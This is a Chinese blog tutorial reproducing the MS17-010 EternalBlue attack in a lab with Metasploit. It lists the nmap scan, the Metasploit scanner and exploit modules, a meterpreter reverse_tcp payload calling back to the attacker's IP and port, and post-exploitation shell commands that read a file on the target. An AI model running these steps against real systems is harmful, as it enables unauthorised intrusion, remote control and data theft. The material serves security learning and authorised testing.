kali初讲——Metasploit攻击ms17_010复现

Metasploit攻击——ms17_010漏洞利用

导论

学习此教程需遵守《中华人民共和国信息安全法》

所有教程仅用于信息安全测试,且在授权的情况下进行,请勿用于其他用途!

一、ms17_010简介

ms17_010漏洞其实就是永恒之蓝,属于一个较早期的windows的一个bug,攻击端口为445端口。
2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
英文为:Eternal Blue,翻译过来就是:永恒之蓝。
其实我们现在使用的电脑,几乎没有这个这个bug了。而且,不久之后,微软公司就针对这个bug发布了漏洞补丁。所以,该漏洞在当前很多系统上已经不存在了。

二、攻击使用模块

本次攻击利用的攻击工具为:Metasploit也就是MSF
主要用到Auxiliary(辅助模块),exploit(攻击模块),payload(攻击载荷),使用辅助模块为MSF中的:

auxiliary/scanner/smb/smb_ms17_010

exploit使用的主要是:

exploit/windows/smb/ms17_010_eternalblue

攻击载荷payload使用:

payload/windows/x64/meterpreter_reverse_tcp

内网测试搭建环境:

攻击机ip:192.168.3.125
靶机ip:192.168.3.127
反弹端口:3333

三、、攻击思路

1、nmap扫描靶机是否存在漏洞,得到漏洞名称
2、通过MSF中的辅助模块,验证漏洞是否存在
3、使用exploit相对应的模块进行攻击
4、设置攻击载荷
5、反弹shell
6、查看权限
7、查看靶机上的文件

四、具体实施

nmap扫描靶机漏洞及开放端口

命令为:nmap --script=vuln -Pn 192.168.3.127
192.168.3.127,为你自己靶机的ip

在这里插入图片描述
新开终端,并进入root账户。
我们在使用Linux的时候,你可以开多个终端。
打开msf

root权限:sudo -i 
打开msf:msfconsole

在这里插入图片描述
查询ms17_010辅助模块

命令:search ms17_010

在这里插入图片描述
打开所需要的辅助模块(auxiliary)

命令:use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述
查询该辅助模块需要设置的一些参数

命令:options

在这里插入图片描述
我们可以看到,需要设置的参数有:

靶机IP:RHOSTS
攻击端口:RPORT

这里rport(攻击端口)已经设置完成,我们便不在设置

设置所要攻击的主机ip命令:set rhosts 192.168.3.127
设置攻击端口:set rport 445

在这里插入图片描述
设置完成,然后扫描目标ip是否存在该漏洞
在这里插入图片描述
从图中我们可以看出,目标ip存在漏洞ms17_010,并且,得到了目标的系统版本:windows7 professional。
确定目标上包含此漏洞,那我们下一步肯定是利用该漏洞啦!
没错,就是exploit(攻击模块)
查询攻击模块:

命令:search ms17_010

在这里插入图片描述
我们这里使用的是eternalblue(永恒之蓝)

模块:exploit/windows/smb/ms17_010_eternalblue

打开该攻击模块

命令:use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
查看该模块需要设置的参数,就是:options/info

命令:options

在这里插入图片描述
其实这里也是有两个需要设置的参数,和上面一样的

靶机ip:rhosts
端口:rport
分别是:
set rhosts 192.168.3.127
set rport 445

设置完成,我们还需要设置攻击载荷(payload)
先去查询使用的攻击载荷,这里使用的是反弹shell

模块: windows/x64/meterpreter/reverse_tcp

在这里插入图片描述
然后设置payload:

命令:set payload windows/x64/meterpreter/reverse_tcp

然后查看需要设置的参数,命令和上面的一样:options
在这里插入图片描述
查询后开始设置,不过这里需要注意的是,我们这里设置的不是靶机的ip和端口,而是攻击机的ip和端口,这里需要注意。我们在使用msf中,需要注意是rhosts还是lhost,或者rports还是lport,这两个是有区别的,前者为被攻击,后者为攻击。

设置反弹ip:set lhost 192.168.3.125
设置反弹端口:set lport 3333

至此,利用ms17_010漏洞的所有都设置完毕,然后我们当然是进行最后一步,运行所有设置,攻击靶机

命令:run/exploit

在这里插入图片描述
不出意外的话,一稍等个几分钟,应该会返回如下界面
在这里插入图片描述
出现这个界面,说明我们的攻击已经成功了。
然后我们查询系统信息

命令:sysinfo

在这里插入图片描述
一般我们攻击肯定是有目的的攻击
我在我的靶机桌面创建了一个名为test的txt文件,我们下面就去,访问他,其中的内容。
使用windows下的shell
我们直接输入:

命令:shell

然后便切换到了windows的命令行也就是我们平时使用的cmd
在这里插入图片描述
然后我们列出当前文件夹位置,存在的所有文件

命令:dir

在这里插入图片描述
我们都知道,在windows中,桌面其实存在Users下的用户文件夹下面
我这里的用户名为:admin
所以我们使用命令直接切换到admin下

命令:cd Users/admin

在这里插入图片描述
在往下切一级文件目录,我们是不是就进入了桌面文件

命令:cd Desktop

在这里插入图片描述
查看文件内容

命令:more test.txt

在这里插入图片描述

至此,对ms17_010漏洞的复现就讲解完了

总结

其实我们去对目标进行渗透的时候,无非分成下面这几步
1、对目标进行信息收集
2、扫描目标可能存在的的漏洞
3、对漏洞进行测试
4、使用攻击脚本
5、得到想要的结果
当然,实际问题实际分析,要把自己的思维活跃起来!
文中如有错误,请联系笔者修改!
如有侵权,请联系笔者删除!

  • 2
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值